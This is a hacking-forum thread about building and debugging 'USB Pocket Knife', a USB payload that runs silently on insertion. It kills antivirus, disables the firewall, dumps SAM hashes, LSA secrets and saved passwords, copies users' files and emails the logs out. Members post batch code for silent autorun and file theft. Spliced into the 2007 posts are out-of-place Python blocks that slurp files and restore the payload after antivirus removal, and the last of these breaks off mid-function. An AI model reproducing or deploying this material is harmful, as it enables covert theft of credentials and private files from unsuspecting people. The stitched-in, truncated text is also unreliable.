Leapo (Author) Posted June 16, 2007

Introduction:
Let me start off by saying that this is NOT YET a final payload; this thread's purpose is to serve as a learning experience for me while providing a useful end-all be-all payload to the community. For now I will provide the payload in its current state at the end of this post.

This payload is the result of slowly browsing this forum and saving every bit of code and every full payload I've come across, then stitching it all together into a modular switchblade with just about every feature in existence. I've gone through and fully commented most of the code (still working on that), I've made sure everything is virus free, I've separated out major functions so that they can be turned on and off at will, and I've made sure it runs completely silently on a U3 and non-U3 thumbdrive in the least obvious way possible.

Current State and Features:
The following is a list of everything included in the payload.

Key:
- Non-U3 Drives Only
- U3 Drives Only
- Not Yet Implemented
- Everything Else

Features:
- Upon insertion, the first option in the Autorun dialog box starts the payload, while appearing only to open the drive.
- Full silent autorun with no user interaction for U3 drives.
- A "Menu.bat" is included to manage all special functions, modules, and features of the switchblade.
- Payload checks the root of the C: drive and prevents the payload from running if the file "Safety.txt" is found.
- Includes TightVNC viewer so you always have it with you.
- Includes Notepad++ for easy batch editing.
- Includes antidote batch files for Nmap, the Hacksaw, and VNC.
- Fully commented code and fully featured ReadMe with instructions on setting up the payload for your needs.
- A custom backup and restore script, which automatically restores the switchblade (to the last time it was backed up) before every run. This ensures the payload is always put back to a normal state, even after it's been nuked by an antivirus.
- A custom auto-update script that goes out and downloads the most recent versions of many of the tools used on the switchblade (pwdump, nircmd, etc.). Simply run it from Menu.bat, and the tools will be downloaded, extracted, and installed into the payload. The backup archive for the entire payload will also be updated to keep the latest versions of the files from being overwritten by an old backup. *Working on a way to get this working for U3 drives.
- Auto-compress logs as they are generated to save space.
- Email logs back to yourself.
- Optional auto-repack of executable to circumvent AV detection.

Payload Components:
- Runs AVKill (csrss.exe)
- Restores the payload to the last backup point
- Disables the Windows Firewall silently
- Hides hidden and system files
- Enables the Remote Desktop service
- Dumps general system info
- Dumps the SAM
- Dumps LSA secrets
- Dumps LSA secrets via an alternate method (less detectable, not as pretty)
- Dumps network passwords
- Dumps messenger passwords
- Dumps IE passwords
- Dumps saved wireless keys
- Dumps URL history
- Dumps Firefox passwords (supports Firefox 3)
- Dumps cache passwords
- Dumps current network services
- Generic port scanning
- Dumps current external IP
- Dumps email, messenger, and general website passwords
- Dumps currently installed hot fixes and IE history
- Dumps Google Chrome passwords
- Installs Hacksaw the usual way
- Installs WinVNC client
- Installs Nmap as a service (emails you results like the Hacksaw)
- Installs a keylogger which emails its logs off to you daily [broken!]
- File slurping for logs, chat logs, downloads, bookmarks, etc. (smaller files)
- File slurping for various Documents and Media folders (larger files)
- Opens an explorer window to the Documents folder when finished
- Automatic update script to keep various executables up to date
- Compresses logs as they are generated to save space
- Optionally emails logs in addition to storing them on the switchblade
- Management interface to manage the various functions of the Pocket Knife
- Ability to save up to 3 configuration profiles [New!]
Leapo (Author) Posted June 16, 2007

Modules In Development: Please Stand By
Leapo (Author) Posted June 16, 2007

Known Bugs:
- Keylogger is currently non-functional
- Payload may cause No Disk errors on systems with card readers (will be fixed in next version)
Leapo (Author) Posted June 16, 2007

Download Payload:
Here's where you'll find the most recent full build of my payload; I'll try to keep this as up to date as I can as I receive and work out fixes and optimizations. I'll always post a notification when a new version is available, or when an update is made to the code in my above posts.

Current Version: USB Pocket Knife 0.8.8.0 by Leapo
Release Date: October 6, 2008
Download Mirrors: MegaUpload, and RapidShare
Note: The above includes both the U3 and non-U3 versions of the payload. The ISO is now pre-built, just flash and go!!!

Payload Change Log:

October 6, 2008: Pocketknife 0.8.8.0 Released
- Change 0: Payload can now be set to shut down the PC after it's finished.
- Change 1: Now dumps Google Chrome passwords.
- Change 2: New profile management system, save up to 3 payload configurations!
- Change 3: If "Safety.txt Check" is disabled, Menu.bat will now show the "run payload" option even if Safety.txt is found.
- Change 4: Made some cosmetic fixes to Menu.bat.

September 28, 2008: Pocketknife 0.8.7.0 Released
- Change 0: Backup script in Menu.bat works again.
- Change 1: Auto-update script in Menu.bat works again.
- Change 2: Many path errors fixed.
- Change 3: Added OS detection to increase compatibility.
- Change 4: Slurp now uses variables instead of hard paths to improve compatibility.
- Change 5: Slurp now grabs data from Pidgin.
- Change 6: Prebuilt U3 ISO included!

September 19, 2008: Pocketknife 0.8.6.5 Released
- Change 0: Invalid directory name broke just about all of 0.8.6.0; this has been corrected.
- Change 1: AVKill's executable was missing from the U3 version of the payload.
- Change 2: File Copier's executable was missing entirely.

September 15, 2008: Pocketknife 0.8.6.0 Released
- Change 0: Fixed U3 compatibility (was broken in 0.8.5.5).
- Change 1: Slurp 2 should now work properly.

September 17, 2008: Pocketknife 0.8.5.5 Released
- Change 0: Fixed "Port Scan" not running correctly.
- Change 1: PwDump failing to create service.
- Change 2: FgDump failing to output anything.
- Change 3: Firepassword updated, now works with Firefox 3.0.
- Change 4: PwDump updated to 1.7.2.
- Change 5: FgDump updated to 2.1.0.

September 14, 2008: Pocketknife 0.8.5.0 Released
- Change 0: Animation_1.cfg was missing, causing some features of Menu.bat to malfunction.
- Change 1: Fixed an ordering issue in Start.bat.
- Change 2: Fixed an issue with GO.vbs causing it to start more than one copy of Start.bat.
- Change 3: Fixed a typo preventing the "Dump Mail Passwords" module from running.
- Change 4: Fixed a typo preventing the "Dump Updates-List" module from running.
- Change 5: Fixed "Dump Mail Passwords" not running correctly.
- Change 6: Fixed "Dump Network Passwords" not running correctly.
- Change 7: Fixed "Dump Messenger Passwords" not running correctly.
- Change 8: Fixed "Dump LSA Secrets" not running correctly.
- Change 9: AVKill should now operate silently.
- Change 10: File structure created by Slurp was cleaned up.
- Change 11: Folder now opens AFTER the payload finishes, not before (if it's selected to open at all).

September 11, 2008: Pocketknife 0.8.2.0 Released
- Change 0: Bug causing Safety.txt to be ignored fixed.
- Change 1: "No Disk" errors should be resolved.
- Change 2: New "disarm" feature to prevent it from starting at all.
- Change 3: Three options on what folder to open after completion: Logs, Root, or None.
- Change 4: ReadMe brought up to date.
- Change 5: "Disable Firewall" is now totally silent (disables Security Center first).

August 31, 2008: Pre-Release 0.8.1.0 Released
- Change 0: Now fully U3 compatible (fixed from v0.8.0.0).
- Change 1: Menu.bat has been greatly reduced in size.

June 09, 2008: Pre-Release 0.8.0.0 Released
- Change 0: Payload overhauled from the ground up.
- Change 1: Now fully U3 compatible (broken in this build).
- Change 2: Menu system overhauled.
- Change 3: Both versions of the payload launch silently for sure!

November 24, 2007: U3 ISO
- Change 0: Fixed the U3 ISO to launch the payload silently.

November 10, 2007: Beta 0.6.2.1 Release
- Change 0: VNC install method updated.
- Change 1: Backup and restore script streamlined.
- Change 2: Automatic updates added.
- Change 3: Centralized management interface added.

June 20, 2007: Beta 0.4 Release
- Change 0: Added a custom backup and restore script (restores the payload before every run to keep it safe from AV software).
- Change 1: Updated the ReadMe with new information about the backup and restore function, PLEASE READ THE README!
- Change 2: Improved and added more comments to the code.
- Change 3: Fixed various typos in my comments.

June 18, 2007: Beta 0.3 Release
- Change 0: Completely overhauled Slurp and Slurp2.bat.
- Change 1: Fixed Port_Scan.bat (thanks go to Elmer and GonZor for their help).
- Change 2: Improved and added more comments to the code.
- Change 3: Fixed various typos in my comments.

June 16, 2007: Initial Post
- Change 0: Initial Release
Leapo (Author) Posted June 16, 2007

Reserved for future use by OP due to character limits...
elmer Posted June 16, 2007

Holy USB Hacks, Batman! This is cool. I can't wait to download it. How long did it take you to make this?
setzer1411 Posted June 16, 2007

A shit ton of potential here, can't wait to see the outcome...
Leapo (Author) Posted June 16, 2007

Download link posted, have at it! Any fixes you guys come up with I'll add to the payload; let's see if we can make this "the one". As for how long I've been working on it... well, I've been slowly building it since the original Hacksaw came out (not bad for my 10th through 14th posts). I'll keep hammering away on my end; I really want to change the slurp.bat and slurp2.bat files over to FileCopy (FC.exe) instead of xCopy to remove the need to make a new xCopy command for every file extension you want to slurp. I'll probably have it all fixed by tonight, but feel free to use the current incarnation of Slurp, it just isn't quite as efficient as the new version will be.
elmer Posted June 16, 2007

I'm downloading it right now. I am going to read it all, then post any fixes I have. Oh, if you need more mirrors, I put this on MegaUpload, FileSend, Deposit Files, FlyUpload, and Badongo (I really don't want this to get lost, like hackblade.rar).
Leapo (Author) Posted June 16, 2007

Holy cow elmer, thanks! You got those mirrors up darn quick! I'm going to go ahead and add those mirrors to the main download post.
MacMike Posted June 16, 2007

Works great, thanks... But the Hacksaw won't work :( I tried it on different computers but it didn't work. One time it did with some other payloader, but the same loader on another comp didn't work anymore...
elmer Posted June 16, 2007

I am going to try and make this U3 compatible.

EDIT: Just fixed the port scan (I think). The new code is:

    Echo ************************************ > %~d0\Documents\logfiles\%computername%\Port_Scan.log 2>&1
    echo ************[Port Scan]************* >> %~d0\Documents\logfiles\%computername%\Port_Scan.log 2>&1
    Echo ************************************ >> %~d0\Documents\logfiles\%computername%\Port_Scan.log 2>&1
    portqry -local -l %~d0\Documents\logfiles\%computername%\%computername%_ports.txt>>nul
    type %~d0\Documents\logfiles\%computername%\%computername%_ports.txt >> %~d0\Documents\logfiles\%computername%\Port_Scan.log 2>&1
    del /f/q %~d0\Documents\logfiles\%computername%\%computername%_ports.txt

You will have to uncomment it in start.bat to make it work. Also, I like the safety thing. Pretty neat.
Leapo (Author) Posted June 17, 2007

@MacMike: That's strange, considering I use the same method of launching the Hacksaw that's employed on U3 distributions of the Hacksaw. I downloaded the original U3 Hacksaw (the same one used on the show), copied the thumbdrive portion directly over to my payload, then I pulled the VB script they used to start the switchblade from the CD partition, decoded it, and modified it to work from the WIP\CMD folder. In other words, if the original "as-seen-on-TV" Hacksaw works, so should my Hacksaw, because all that was changed was a path or two. Are you sure you edited send.bat correctly? If you don't enter the information exactly right, it'll just silently fail to send. Also, make sure you're using a Gmail password that contains NO SPACES; passwords with spaces aren't properly supported (everything after the first space is ignored).

@elmer: Thanks for the fix, I'll test it out a little and add it to the payload, along with my new versions of Slurp and Slurp2.bat... after I compare it to my busted code to see what you had to change to fix it XD
elmer Posted June 17, 2007

I forgot how to copy multiple files/file types with fc.exe, so tell me if you know how. I checked in the /? (fc.exe /?) and it didn't say anything about it. I PM'd Obi-Wahn, but he hasn't gotten back to me yet.

EDIT: You should try to get on Hak5Live RC1.5. The RC1 had some community stuff in it, and some air time couldn't hurt.
Leapo (Author) Posted June 17, 2007

Well, bad news elmer, I'm getting no output from the code you posted. It looks like the batch file isn't finding the executable (PortQry.exe) that's sitting in the folder with it. The "CD" command I had in there before fixed this issue, but it broke other batch files when run in succession...

Edit: Getting fc.exe to copy multiple files of multiple types is pretty darn easy compared to xCopy. The example code below will copy everything from the ".\TestCopy From" folder to the ".\TestCopy To" folder (this includes sub folders and anything located within them):

    fc.exe ".\TestCopy From\*" ".\TestCopy To\*" /i /o

So for example, here's what Slurp2.bat (used for copying the entire contents of the My Documents folder and Desktop) looks like using xCopy:

    :: My Documents files
    mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments
    mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\MyMusic
    mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\MyVideos
    mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\MyPictures
    xcopy "C:\Documents and Settings\%username%\My Documents\*.doc" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.docx" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.rtf" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.txt" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.xls" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.csv" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.ppt" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.pptx" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.mdb" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.jpg" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyPictures /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.png" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyPictures /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.bmp" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyPictures /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.gif" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyPictures /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.htm" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.html" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.eml" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.msg" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.zip" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.rar" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.7z" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.psd" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyPictures /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.jpg" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyPictures /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.wma" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyMusic /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.wav" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyMusic /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.mp3" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyMusic /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.ogg" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyMusic /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.mpg" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyVideos /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.avi" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyVideos /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\My Documents\*.wmv" ..\..\Documents\logfiles\%computername%\Slurp_Data\MyVideos /s/c/q/r/h

    :: Desktop files
    mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop
    xcopy "C:\Documents and Settings\%username%\Desktop\*.doc" ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop\*.rtf" ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop\*.txt" ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop\*.xls" ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop\*.csv" ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop\*.ppt" ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop\*.mdb" ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop\*.jpg" ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop\*.gif" ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop\*.htm" ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop\*.eml" ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop\*.msg" ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop /s/c/q/r/h

And here's what it looks like using FileCopier (fc.exe):

    :: My Documents files
    mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments
    fc.exe "C:\Documents and Settings\%username%\My Documents\*" "..\..\Documents\logfiles\%computername%\Slurp_Data\MyDocuments\*" /i /o

    :: Desktop files
    mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop
    fc.exe "C:\Documents and Settings\%username%\Desktop\*" "..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop\*" /i /o

Many thanks to Obi-Wahn for making such a helpful application!
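As an added example (not code from the Pocketknife payload or from anyone in this thread), here is the same categorised recursive copy done in Python: one walk of the source tree, an extension-to-folder map in place of one xcopy line per extension, and an optional size cap so a single function can serve both the "smaller files" and "larger files" slurps. The category map, the paths, the 1 KiB cap and the sample tree the demo builds are assumptions made for illustration. One caveat on the batch approach above: the fc.exe used there is Obi-Wahn's FileCopier, not the Windows file-compare utility of the same name in System32, and cmd resolves a bare command name against the current directory before PATH. If the batch file's working directory is not the payload folder, plain fc.exe runs the wrong program; calling it as .\fc.exe (the same fix GonZor gives for PortQry below) avoids that.

```python
"""Added example, not part of the Pocketknife payload: a single recursive walk that
sorts files into category folders by extension, replacing one xcopy per extension.
Category map, paths, size cap and the sample tree are assumptions for illustration."""
import os
import shutil
import tempfile
from pathlib import Path
from typing import Optional

# Hypothetical category map modelled on the MyDocuments/MyPictures/MyMusic/MyVideos
# split in Slurp2.bat. Extensions are matched case-insensitively.
CATEGORIES = {
    "MyDocuments": {".doc", ".docx", ".rtf", ".txt", ".xls", ".csv", ".ppt", ".pptx",
                    ".mdb", ".htm", ".html", ".eml", ".msg", ".zip", ".rar", ".7z"},
    "MyPictures": {".jpg", ".png", ".bmp", ".gif", ".psd"},
    "MyMusic": {".wma", ".wav", ".mp3", ".ogg"},
    "MyVideos": {".mpg", ".avi", ".wmv"},
}


def category_for(path: Path) -> Optional[str]:
    """Return the category folder for a file, or None if its extension is not wanted."""
    ext = path.suffix.lower()
    for name, exts in CATEGORIES.items():
        if ext in exts:
            return name
    return None


def slurp(src: Path, dst: Path, max_bytes: Optional[int] = None) -> dict:
    """Walk src recursively and copy matching files to dst/<category>/<relative path>.
    Like xcopy /s/c/h it descends into subfolders, keeps going after an error and
    ignores hidden attributes. Files over max_bytes are skipped, so one call can do
    the small-file slurp and another (with no cap) the documents/media slurp.
    Returns per-category counts plus 'skipped' and 'errors'."""
    stats = {name: 0 for name in CATEGORIES}
    stats["skipped"] = 0
    stats["errors"] = 0
    for root, _dirs, files in os.walk(src):
        for fname in files:
            path = Path(root) / fname
            cat = category_for(path)
            if cat is None:
                stats["skipped"] += 1
                continue
            try:
                if max_bytes is not None and path.stat().st_size > max_bytes:
                    stats["skipped"] += 1
                    continue
                target = dst / cat / path.relative_to(src)
                target.parent.mkdir(parents=True, exist_ok=True)
                shutil.copy2(path, target)  # copy2 keeps timestamps, as xcopy does
                stats[cat] += 1
            except OSError:
                stats["errors"] += 1  # xcopy /c behaviour: carry on after an error
    return stats


def build_sample_tree(base: Path) -> None:
    """Constructed sample input (not real user data) so the example runs offline."""
    (base / "notes").mkdir(parents=True)
    (base / "report.docx").write_bytes(b"x" * 10)
    (base / "notes" / "todo.txt").write_text("call bank")
    (base / "holiday.JPG").write_bytes(b"\xff\xd8" + b"\x00" * 20)  # upper-case ext
    (base / "song.mp3").write_bytes(b"\x00" * 2048)                  # over the 1 KiB cap
    (base / "setup.exe").write_bytes(b"MZ")                          # no category


def run_demo() -> tuple:
    """Build the sample tree in a temp dir, slurp it with a 1 KiB cap and return
    (stats, contents of one copied file) so the result can be checked."""
    with tempfile.TemporaryDirectory() as tmp:
        src, dst = Path(tmp) / "src", Path(tmp) / "Slurp_Data"
        build_sample_tree(src)
        stats = slurp(src, dst, max_bytes=1024)
        copied = (dst / "MyDocuments" / "notes" / "todo.txt").read_text()
        return stats, copied


if __name__ == "__main__":
    print(run_demo())
```

Run as a script it reports two documents and one picture copied, with the oversized mp3 and the exe skipped; drop max_bytes (or raise it) for the large-file pass. Relative paths are preserved under each category folder, which is what the /s switch gave the xcopy version.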
GonZor Posted June 17, 2007

Hey, I haven't downloaded your payload yet to test but I noticed this line in your code for the scan:

    copy Documents\logfiles\%computername%\Port_Scan.log+Documents\logfiles\%computername%\%computername%_ports.log >>nul

The syntax for copy is COPY <file1>+<file2> <dest>. You'll notice you don't have a destination, you just move the data to NUL. Put your destination in and it should work fine.

If it isn't finding "PortQry.exe", call the file like so: ".\PortQry.exe". This will look for the file in where the batch file is located.

By the way, I think I'll have to challenge you for the title of this payload being "the one", sorry.
Leapo (Author) Posted June 17, 2007

Thanks for the tip GonZor, I'll give that a shot (I wasn't the original author of that particular chunk of code, so I wasn't exactly sure what was going on there).

As for whose payload is 'the one'... you do have the advantage of having your payload on the U3 section of the flash drive, which keeps everything safe from deletion by an antivirus and makes sure it auto-runs without any user interaction, but there are quite a few trade-offs for doing it that way (yours can't be installed on a USB hard disk and used for mass file slurping, for instance). Now it isn't like my payload is completely perfect either, but we're still debugging the darn thing in here :P

I've just downloaded your payload, and I see I have a few things you don't, and you have a few things I don't. Considering my payload is already a compilation of over 5 other payloads, would you mind if I added some code from yours into the mix as well? :D
GonZor Posted June 17, 2007

Quoting Leapo: "Considering my payload is already a compilation of over 5 other payloads, would you mind if I added some code from yours into the mix as well?"

No problem. It is possible for my payload to run on any drive actually :-P In my completely biased opinion I'd say the best thing about my payload is the fact it is customizable from a GUI, no more editing code, but considering both our payloads are still in development we will have to wait to see whose will be better, or we could put them together to create "the ULTIMATE one"? Maybe. Anyway, if you need help let me know.
setzer1411 Posted June 17, 2007

Holy hell this is badass, I can't wait for the U3 version, this is great.
Leapo (Author) Posted June 18, 2007

First things first, a new version has been released! Major highlights for this release include completely overhauled versions of Slurp and Slurp2.bat (now renamed fc_slurp and fc_slurp2.bat), a fixed version of Port_Scan.bat (thanks go to Elmer and GonZor for their help), and improvements to my code comments such as typo fixes and additional information. So, version 0.3 is now up; the download link is in the usual place (in the 4th post of the thread, along with a change log)... Or if you're all too lazy to scroll up to my original posts, here are the links for Rapidshare and MegaUpload.

@Elmer and GonZor: Thanks for the help with this pesky module. It took a little more tweaking to get Port_Scan.bat to work properly, but I finally managed to get it to play nice with the other modules. It might be a tad unconventional, but at least it works:

    mkdir ..\..\Documents\logfiles\%computername%
    Echo ************************************ > ..\..\Documents\logfiles\%computername%\Port_Scan.log 2>&1
    echo ************[Port Scan]************* >> ..\..\Documents\logfiles\%computername%\Port_Scan.log 2>&1
    Echo ************************************ >> ..\..\Documents\logfiles\%computername%\Port_Scan.log 2>&1
    .\portqry -local -l ..\..\Documents\logfiles\%computername%\%computername%_ports.txt>>nul
    type ..\..\Documents\logfiles\%computername%\%computername%_ports.txt >> ..\..\Documents\logfiles\%computername%\Port_Scan.log 2>&1
    del /f/q %~d0\Documents\logfiles\%computername%\%computername%_ports.txt

@GonZor: Interesting proposition, merging our payloads, but how would we go about it? At this point, most of my code would need to be overhauled to work with the rest of your payload, but it looks like bringing over the modules I'm missing from your payload would be relatively easy... seems a shame, though, considering how clean your code is compared to mine (though mine doesn't need to be as clean due to the use of Start.bat to manage active modules).

@Elmer: You mentioned something about attempting to make my payload U3 compatible; if that works out, and I converted over the modules from GonZor's payload that I don't have, the only thing his current payload would have over mine is that it runs completely off of the CD partition of the U3 drive. If there's a way to keep the non-U3 portion of a flash drive safe from being nuked by antivirus software, this might just be the way to go.
setzer1411 Posted June 18, 2007

I have spent a long time trying to find a way to protect the non-U3 side from AV software and I couldn't find anything, but I agree, if you could simply protect them on the non-U3 side it would be simpler. The AV nuking is the only reason I don't use your payload on a day-to-day basis. Once again I would like to say keep up the outstanding work.
Leapo (Author) Posted June 18, 2007

I might have an idea as to how to do it... anybody know of a command-line app that can automatically unzip an encrypted or password-protected archive? If I could store a copy of the contents of my payload (or at least the parts that would be suspect for deletion) in an encrypted archive, and have it unzip automatically before every payload run, you would effectively have an unbreakable switchblade. True, this doesn't prevent the apps from being deleted, but it would restore the apps and fix the payload automatically before the next run... WOW, I think I might have something there!! :shock:
GonZor Posted June 18, 2007

Quoting Leapo: "[...] seems a shame, though, considering how clean your code is compared to mine (though mine doesn't need to be as clean due to the use of Start.bat to manage active modules)."

Yes, my code is much cleaner and readable because I have written my code from scratch and not just ripped the code from the wiki (sorry, had to say it). Basically my payload will include all of your functions as well eventually but be much easier to customize.

Quoting setzer1411: "I have spent a long time trying to find a way to protect the non-U3 side from AV software and I couldn't find anything [...]"

I am working on a possible solution to this problem. I'll get back to you on this.

Quoting Leapo: "[...] anybody know of a command-line app that can automatically unzip an encrypted or password-protected archive? [...]"

You posted while I was writing. Yes, this may be possible, but it may also delete the archive while it is being accessed. To solve that you may need to copy the encrypted volume before extracting; that way you never extract from the original volume and it will stay intact. You could try this with TrueCrypt (good encryption, easy to use via command line) but you may not always have access to extract.
elmer Posted June 18, 2007

I know how to get it U3 compatible. Here we go! I really hope this works.

    [AutoRun]
    open=start.bat

    @echo off
    @start /min for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do %%i:\Manual_Scan.bat
    @exit

I will try to upload the U3CUSTOM.ISO when I can.

Re: New version
I have mirrors! DepositFiles, FileSend, ZUpload, and Badongo.

Re: Protection from AV
Quoting Leapo: "anybody know of a command-line app that can automatically unzip an encrypted or password-protected archive?"

TrueCrypt can work from the command line. I would go about this in a similar fashion to what you have stated. I would put the entire payload onto the encrypted drive and give it an autorun.inf that would run the payload. It would be harder to make the U3 version of this, but something in the wiki talked about using TrueCrypt with the switchblade.

EDIT: Fixed the code (from %i to %%i).
GonZor Posted June 18, 2007

Quoting elmer: "TrueCrypt can work from the command line. I would go about this in a similar fashion to what you have stated. I would put the entire payload onto the encrypted drive and give it an autorun.inf that would run the payload."

Yes, it's actually very simple to do, although the problem is TrueCrypt doesn't always work. Then again, I guess if you don't have permissions to use TrueCrypt the logs generated wouldn't be much use. Once again, it would be a valid idea to copy the volume and never extract from the original volume; AVs can decimate a volume if you can access it.
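The restore-before-every-run idea worked through in the last few posts, as an added example that is not the Pocketknife backup script and does not use TrueCrypt: a zip archive of the payload carries a SHA-256 manifest; before a run, every listed file is hashed and anything missing or altered is re-extracted from the archive, so a tool quarantined by an antivirus is back in place for the next run. Following GonZor's point, the archive is first copied to a scratch directory and only the copy is opened, so the original is never held open while its contents are being written back out. File names, paths and the toy payload are assumptions for illustration; Python's zipfile can read password-protected (ZipCrypto) entries through its pwd= argument but cannot write them, so the demo archive is unencrypted.

```python
"""Added example, not the Pocketknife backup script: a manifest-checked restore of a
payload directory from a zip archive, run before each payload execution. Paths, the
toy payload and the simulated antivirus action are assumptions for illustration."""
import hashlib
import json
import shutil
import tempfile
import zipfile
from pathlib import Path
from typing import Optional

MANIFEST = "manifest.json"  # assumed name of the hash list stored inside the archive


def sha256_file(path: Path) -> str:
    """Hex SHA-256 of a file, read in chunks so large tools do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def backup(payload_dir: Path, archive: Path) -> dict:
    """Snapshot every file under payload_dir into archive with a manifest of hashes.
    Returns the manifest ({relative posix path: sha256})."""
    manifest = {}
    with zipfile.ZipFile(archive, "w", zipfile.ZIP_DEFLATED) as zf:
        for path in sorted(payload_dir.rglob("*")):
            if path.is_file():
                rel = path.relative_to(payload_dir).as_posix()
                manifest[rel] = sha256_file(path)
                zf.write(path, rel)
        zf.writestr(MANIFEST, json.dumps(manifest, indent=1))
    return manifest


def restore(payload_dir: Path, archive: Path, pwd: Optional[bytes] = None) -> list:
    """Compare payload_dir against the manifest in archive and re-extract anything
    missing or modified. The archive is copied to a scratch directory first and the
    copy is the one read, so the original is never open during extraction.
    Returns the relative names of the files that were put back."""
    restored = []
    with tempfile.TemporaryDirectory() as scratch:
        working = Path(scratch) / archive.name
        shutil.copy2(archive, working)  # never extract from the original volume
        with zipfile.ZipFile(working) as zf:
            manifest = json.loads(zf.read(MANIFEST, pwd=pwd))
            for rel, digest in manifest.items():
                target = payload_dir / rel
                if target.is_file() and sha256_file(target) == digest:
                    continue  # intact: leave it alone
                target.parent.mkdir(parents=True, exist_ok=True)
                with zf.open(rel, pwd=pwd) as src, target.open("wb") as dst:
                    shutil.copyfileobj(src, dst)
                restored.append(rel)
    return restored


def run_demo() -> tuple:
    """Constructed scenario: back up a toy payload, simulate an antivirus removing one
    tool and emptying a batch file, then restore. Returns (restored names, all intact)."""
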